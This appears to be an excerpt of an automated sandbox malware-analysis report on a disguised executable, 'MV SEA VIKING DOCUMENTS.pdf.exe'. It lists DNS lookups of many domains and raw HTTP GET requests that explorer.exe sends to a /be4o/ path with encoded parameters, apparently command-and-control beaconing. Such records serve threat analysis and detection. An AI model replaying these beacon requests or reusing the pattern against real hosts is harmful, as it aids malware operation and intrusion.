                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.940363884 CET192.168.11.201.1.1.10x11aaStandard query (0)www.eaglesaviationexperience.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.126812935 CET192.168.11.201.1.1.10x45a2Standard query (0)www.easypeasy.communityA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:43.234884977 CET192.168.11.201.1.1.10x80b3Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.275760889 CET192.168.11.201.1.1.10x56f9Standard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.337985992 CET192.168.11.209.9.9.90x56f9Standard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.430728912 CET192.168.11.201.1.1.10x59fStandard query (0)www.istemnetwork.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.613698959 CET192.168.11.201.1.1.10xd150Standard query (0)www.brainymortgage.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:43.980432987 CET192.168.11.201.1.1.10x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:44.060471058 CET192.168.11.209.9.9.90x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:45.080615997 CET192.168.11.201.1.1.10x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094183922 CET192.168.11.201.1.1.10x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094238997 CET192.168.11.209.9.9.90x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518302917 CET192.168.11.209.9.9.90x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.525007010 CET192.168.11.201.1.1.10xcf5eStandard query (0)www.justbe-event.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.550146103 CET192.168.11.201.1.1.10x2f93Standard query (0)www.janhenningsen.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.859069109 CET192.168.11.201.1.1.10x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.920610905 CET192.168.11.209.9.9.90x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:15.935929060 CET192.168.11.201.1.1.10x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951534033 CET192.168.11.201.1.1.10x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951581955 CET192.168.11.209.9.9.90x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781862020 CET192.168.11.209.9.9.90x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.794153929 CET192.168.11.201.1.1.10x1bf6Standard query (0)www.kaikkistore.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.901686907 CET192.168.11.201.1.1.10x9fe5Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.963957071 CET192.168.11.209.9.9.90x9fe5Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.677630901 CET192.168.11.201.1.1.10x1529Standard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.753551006 CET192.168.11.201.1.1.10xb7d6Standard query (0)www.istemnetwork.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.641823053 CET192.168.11.201.1.1.10x2c0eStandard query (0)www.vaughnediting.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.704071045 CET192.168.11.209.9.9.90x2c0eStandard query (0)www.vaughnediting.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                              Feb 21, 2022 16:50:16.210630894 CET1.1.1.1192.168.11.200xad13No error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.104245901 CET1.1.1.1192.168.11.200x8cc0No error (0)doc-04-08-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.104245901 CET1.1.1.1192.168.11.200x8cc0No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:29.804508924 CET1.1.1.1192.168.11.200x19cNo error (0)www.neonewway.clubneonewway.clubCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:29.804508924 CET1.1.1.1192.168.11.200x19cNo error (0)neonewway.club79.110.48.188A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.193876028 CET1.1.1.1192.168.11.200xd047No error (0)www.7bkj.com7bkj.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.193876028 CET1.1.1.1192.168.11.200xd047No error (0)7bkj.com154.23.172.38A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.727771997 CET1.1.1.1192.168.11.200x55bfNo error (0)www.waktuk.comwaktuk.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.727771997 CET1.1.1.1192.168.11.200x55bfNo error (0)waktuk.com95.179.246.125A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.797167063 CET1.1.1.1192.168.11.200xc278No error (0)www.quanqiu55555.com38.143.0.82A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.538184881 CET1.1.1.1192.168.11.200x5bbfNo error (0)www.mariachinuevozacatecas24-7.comsslhosting.simplesite.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.538184881 CET1.1.1.1192.168.11.200x5bbfNo error (0)sslhosting.simplesite.com54.154.44.39A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.538184881 CET1.1.1.1192.168.11.200x5bbfNo error (0)sslhosting.simplesite.com34.250.168.42A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.538184881 CET1.1.1.1192.168.11.200x5bbfNo error (0)sslhosting.simplesite.com34.242.161.146A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.807014942 CET1.1.1.1192.168.11.200x6593No error (0)www.antoniopasciuti.comavid3814506.altervista.orgCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.807014942 CET1.1.1.1192.168.11.200x6593No error (0)avid3814506.altervista.org148.251.15.228A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:06.899840117 CET1.1.1.1192.168.11.200x37d8Name error (3)www.marvinhull.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:11.925822020 CET1.1.1.1192.168.11.200xee57Name error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.018098116 CET1.1.1.1192.168.11.200xfdafNo error (0)www.dreamintelligent.com185.190.39.52A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.816301107 CET1.1.1.1192.168.11.200xc9a0No error (0)www.josiemaran-supernatural.comjosiemaran-supernatural.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.816301107 CET1.1.1.1192.168.11.200xc9a0No error (0)josiemaran-supernatural.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.440529108 CET1.1.1.1192.168.11.200xb86fNo error (0)www.rsxrsh.com45.195.115.71A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.168859005 CET1.1.1.1192.168.11.200x2eddNo error (0)www.noireimpactcollective.netnoireimpactcollective.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.168859005 CET1.1.1.1192.168.11.200x2eddNo error (0)noireimpactcollective.net34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:39.347606897 CET1.1.1.1192.168.11.200xa72dName error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:44.369036913 CET1.1.1.1192.168.11.200x43cbNo error (0)www.ooo-club.com35.214.4.70A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:49.444694996 CET1.1.1.1192.168.11.200x2c20Name error (3)www.istemnetwork.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:08.774166107 CET1.1.1.1192.168.11.200x4352No error (0)www.4huav946.com35.244.144.199A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:19.221950054 CET1.1.1.1192.168.11.200x3bfaName error (3)www.personas1web.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:24.431921959 CET1.1.1.1192.168.11.200xc235No error (0)www.itservon.comitservon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:24.431921959 CET1.1.1.1192.168.11.200xc235No error (0)itservon.com162.0.209.21A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:29.943470001 CET1.1.1.1192.168.11.200x1219No error (0)www.fairytalepageants.comfairytalepageants.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:29.943470001 CET1.1.1.1192.168.11.200x1219No error (0)fairytalepageants.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:35.260562897 CET1.1.1.1192.168.11.200x68acNo error (0)www.buresdx.com66.29.154.157A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.536137104 CET9.9.9.9192.168.11.200x8bc8No error (0)www.vendasdigitaisonline.comvendasdigitaisonline.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.536137104 CET9.9.9.9192.168.11.200x8bc8No error (0)vendasdigitaisonline.com213.190.6.63A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.734293938 CET1.1.1.1192.168.11.200x8bc8No error (0)www.vendasdigitaisonline.comvendasdigitaisonline.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.734293938 CET1.1.1.1192.168.11.200x8bc8No error (0)vendasdigitaisonline.com213.190.6.63A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:11.432866096 CET1.1.1.1192.168.11.200x41acName error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:38.343334913 CET1.1.1.1192.168.11.200x4985Name error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:48.473849058 CET1.1.1.1192.168.11.200x46c3Name error (3)www.istemnetwork.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:57.022368908 CET1.1.1.1192.168.11.200xc90aName error (3)www.owensigns.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.260544062 CET9.9.9.9192.168.11.200x209cNo error (0)www.mariachinuevozacatecas24-7.comsslhosting.simplesite.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.260544062 CET9.9.9.9192.168.11.200x209cNo error (0)sslhosting.simplesite.com54.154.44.39A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.260544062 CET9.9.9.9192.168.11.200x209cNo error (0)sslhosting.simplesite.com34.250.168.42A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.260544062 CET9.9.9.9192.168.11.200x209cNo error (0)sslhosting.simplesite.com34.242.161.146A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.327531099 CET1.1.1.1192.168.11.200x209cNo error (0)www.mariachinuevozacatecas24-7.comsslhosting.simplesite.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.327531099 CET1.1.1.1192.168.11.200x209cNo error (0)sslhosting.simplesite.com54.154.44.39A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.327531099 CET1.1.1.1192.168.11.200x209cNo error (0)sslhosting.simplesite.com34.242.161.146A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.327531099 CET1.1.1.1192.168.11.200x209cNo error (0)sslhosting.simplesite.com34.250.168.42A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.489294052 CET9.9.9.9192.168.11.200xbd8bName error (3)www.percentrostered.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.576991081 CET1.1.1.1192.168.11.200xbd8bName error (3)www.percentrostered.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.981295109 CET9.9.9.9192.168.11.200x9533No error (0)www.nagradi7.com154.214.67.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.985958099 CET1.1.1.1192.168.11.200x9533No error (0)www.nagradi7.com154.214.67.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.984378099 CET1.1.1.1192.168.11.200x11aaNo error (0)www.eaglesaviationexperience.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.984378099 CET1.1.1.1192.168.11.200x11aaNo error (0)ghs.googlehosted.com142.250.186.51A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.172348022 CET1.1.1.1192.168.11.200x45a2No error (0)www.easypeasy.communityeasypeasy.communityCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.172348022 CET1.1.1.1192.168.11.200x45a2No error (0)easypeasy.community91.184.31.217A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:43.265649080 CET1.1.1.1192.168.11.200x80b3Name error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341202974 CET9.9.9.9192.168.11.200x56f9Name error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341559887 CET1.1.1.1192.168.11.200x56f9Name error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.444781065 CET1.1.1.1192.168.11.200x59fName error (3)www.istemnetwork.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)www.brainymortgage.infoparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517788887 CET1.1.1.1192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517807961 CET1.1.1.1192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518939972 CET1.1.1.1192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.345483065 CET9.9.9.9192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347796917 CET9.9.9.9192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347865105 CET9.9.9.9192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.535520077 CET1.1.1.1192.168.11.200xcf5eName error (3)www.justbe-event.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.567264080 CET1.1.1.1192.168.11.200x2f93No error (0)www.janhenningsen.com217.160.0.98A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781239033 CET1.1.1.1192.168.11.200x3c87Server failure (2)www.logotzo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781336069 CET1.1.1.1192.168.11.200x3c87Server failure (2)www.logotzo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781379938 CET1.1.1.1192.168.11.200x3c87Server failure (2)www.logotzo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.830279112 CET1.1.1.1192.168.11.200x1bf6No error (0)www.kaikkistore.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.830279112 CET1.1.1.1192.168.11.200x1bf6No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.989701033 CET1.1.1.1192.168.11.200x9fe5Name error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:31.304647923 CET9.9.9.9192.168.11.200x9fe5Name error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.687225103 CET1.1.1.1192.168.11.200x1529Name error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.765171051 CET1.1.1.1192.168.11.200xb7d6Name error (3)www.istemnetwork.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET1.1.1.1192.168.11.200x2c0eNo error (0)www.vaughnediting.comvaughnediting.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET1.1.1.1192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET1.1.1.1192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET9.9.9.9192.168.11.200x2c0eNo error (0)www.vaughnediting.comvaughnediting.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET9.9.9.9192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET9.9.9.9192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.24A (IP address)IN (0x0001)

                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                              • drive.google.com
                                                                                                                                                                                                                              • doc-04-08-docs.googleusercontent.com
                                                                                                                                                                                                                              • www.neonewway.club
                                                                                                                                                                                                                              • www.7bkj.com
                                                                                                                                                                                                                              • www.waktuk.com
                                                                                                                                                                                                                              • www.quanqiu55555.com
                                                                                                                                                                                                                              • www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              • www.antoniopasciuti.com
                                                                                                                                                                                                                              • www.dreamintelligent.com
                                                                                                                                                                                                                              • www.josiemaran-supernatural.com
                                                                                                                                                                                                                              • www.rsxrsh.com
                                                                                                                                                                                                                              • www.noireimpactcollective.net
                                                                                                                                                                                                                              • www.ooo-club.com
                                                                                                                                                                                                                              • www.4huav946.com
                                                                                                                                                                                                                              • www.itservon.com
                                                                                                                                                                                                                              • www.fairytalepageants.com
                                                                                                                                                                                                                              • www.buresdx.com
                                                                                                                                                                                                                              • www.vendasdigitaisonline.com
                                                                                                                                                                                                                              • www.nagradi7.com
                                                                                                                                                                                                                              • www.eaglesaviationexperience.com
                                                                                                                                                                                                                              • www.easypeasy.community
                                                                                                                                                                                                                              • www.brainymortgage.info
                                                                                                                                                                                                                              • www.janhenningsen.com
                                                                                                                                                                                                                              • www.kaikkistore.com

                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              0192.168.11.2049756142.250.185.174443C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              1192.168.11.2049757142.250.185.161443C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              10192.168.11.2049788185.190.39.5280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.122103930 CET8985OUTGET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:52:18.492628098 CET8985INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:18 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              11192.168.11.204979034.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.827588081 CET8993OUTGET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.997085094 CET8993INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:22 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "620175f5-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              12192.168.11.204979145.195.115.7180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.620803118 CET8994OUTGET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1
